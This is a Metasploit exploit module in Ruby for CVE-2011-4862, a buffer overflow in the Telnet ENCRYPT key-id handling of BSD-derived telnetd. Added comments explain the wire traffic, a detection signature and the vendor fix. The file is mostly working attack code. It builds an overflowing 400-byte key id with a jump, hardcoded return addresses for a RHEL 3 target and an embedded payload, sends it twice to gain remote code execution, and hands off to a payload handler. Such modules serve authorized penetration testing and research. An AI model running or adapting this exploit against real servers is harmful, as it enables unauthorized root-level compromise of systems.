# -*- coding: binary -*-

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the issue listed under 'References' (CVE-2011-4862): a buffer
# overflow in the Telnet ENCRYPT option's key-id handling of BSD-derived telnetd
# implementations (inetutils, krb5-telnet), as the 'Description' below states.
#
# Defender's view of what exploit_target puts on the wire:
#   1. one ENCRYPT suboption negotiation (enc_init),
#   2. one ENCRYPT ENC_KEYID suboption carrying a 400-byte key id, sent twice.
# A key id of that size is far outside normal ENCRYPT negotiation and is a usable
# network-detection signature; the fix is the vendor patch for the referenced CVE
# (or not exposing telnetd at all).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Telnet mixin supplies connect/banner/sock/disconnect; BruteTargets supplies the
  # `exploit` entry point that calls exploit_target(t) per target entry (presumably
  # skipping the 'Automatic' entry, which carries no 'Ret' — confirm against the mixin).
  include Msf::Exploit::Remote::Telnet
  include Msf::Exploit::BruteTargets

  # Module metadata. Constraints worth knowing when reading exploit_target:
  #   - 'Space' => 200: the payload is written at offset 120 of a 400-byte buffer,
  #     so 200 bytes keeps it entirely inside that buffer.
  #   - 'BadChars' => "\x00": a NUL would truncate the payload, presumably because
  #     the target handles the key id as a C string — TODO confirm.
  #   - Only the RHEL 3 target provides 'Ret'; 'Automatic' has an empty options hash.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the encryption option handler of the
          Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions
          use NetKit-derived telnet daemons, so this flaw only applies to a small subset of
          Linux systems running telnetd.
        },
        'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2011-4862'],
          ['OSVDB', '78020'],
          ['BID', '51182'],
          ['EDB', '18280']
        ],
        'Privileged' => true,
        'Platform' => 'linux',
        'Payload' => {
          'Space' => 200,
          'BadChars' => "\x00",
          'DisableNops' => true,
        },

        'Targets' => [
          [ 'Automatic', {} ],
          [ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2011-12-23',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Runs the overflow attempt against one target entry.
  #
  # @param t [Hash] a target's options hash from 'Targets'; must contain 'Ret'
  #   (t['Ret'] is nil for the 'Automatic' entry, so `t['Ret'] - 20` would raise
  #   NoMethodError if this were ever called with it).
  # @return [void] returns early after a status message when the server does not
  #   answer the first request; aborts via fail_with when no ENCRYPT reply arrives.
  def exploit_target(t)
    connect
    # Log the banner with non-printables hex-escaped so server-controlled bytes
    # cannot corrupt the operator's terminal.
    banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
    vprint_status(banner_sanitized)

    # Telnet framing: 0xff 0xfa = IAC SB, 0xff 0xf0 = IAC SE, 0x26 = ENCRYPT (option 38).
    # enc_init starts the encryption negotiation; enc_keyid opens an ENC_KEYID (7)
    # suboption whose body is the key id built below.
    enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
    enc_keyid = "\xff\xfa\x26\x07"
    end_suboption = "\xff\xf0"

    # Telnet requires a literal 0xff inside data to be doubled (IAC escaping);
    # otherwise the server would parse it as a command and corrupt the payload.
    penc = payload.encoded.gsub("\xff", "\xff\xff")

    # 400-byte key id of alphanumeric filler; fixed offsets are patched in below.
    key_id = Rex::Text.rand_text_alphanumeric(400)

    # Offsets 0-1: a short jump (0xeb 0x76; 2 + 0x76 = offset 120, where the payload
    # is placed). Offsets 72-79: two 32-bit little-endian ("V") values derived from
    # the target's 'Ret'.
    key_id[0, 2] = "\xeb\x76"
    key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
    key_id[76, 4] = [ t['Ret'] ].pack("V")

    # Some of these bytes can get mangled, jump over them
    key_id[80, 40] = "\x41" * 40

    # Insert the real payload
    # Same-length slice assignment, so key_id stays 400 bytes as long as the payload
    # fits; 'Space' => 200 in the metadata guarantees 120 + 200 <= 400.
    key_id[120, penc.length] = penc

    # Create the Key ID command
    sploit = enc_keyid + key_id + end_suboption

    # Initiate encryption
    sock.put(enc_init)

    # Wait for a successful response
    # Reads (up to 5s per attempt) until an ENCRYPT suboption reply (0x26 0x02) shows
    # up; an empty read aborts the module.
    # NOTE(review): the inline `rescue nil` hides every StandardError raised by
    # get_once, so a plain connection error is reported as "does not support
    # encryption" rather than as the underlying failure.
    loop do
      data = sock.get_once(-1, 5) rescue nil
      if not data
        fail_with(Failure::Unknown, "This system does not support encryption")
      end
      break if data.index("\xff\xfa\x26\x02\x01")
    end

    # The first request smashes the pointer
    print_status("Sending first payload")
    sock.put(sploit)

    # Make sure the server replied to the first request
    # No `rescue` here, unlike the loop above: a read error propagates to the caller.
    data = sock.get_once(-1, 5)
    unless data
      print_status("Server did not respond to first payload")
      return
    end

    # Some delay between each request seems necessary in some cases
    # IO.select with no descriptors is used as a portable 0.5s sleep.
    ::IO.select(nil, nil, nil, 0.5)

    # The second request results in the pointer being called
    print_status("Sending second payload...")
    sock.put(sploit)
    # Hand off to the payload handler (Msf::Exploit convention) before teardown.
    handler

    # Give the session a moment before closing the exploit socket.
    ::IO.select(nil, nil, nil, 0.5)
    disconnect
  end
end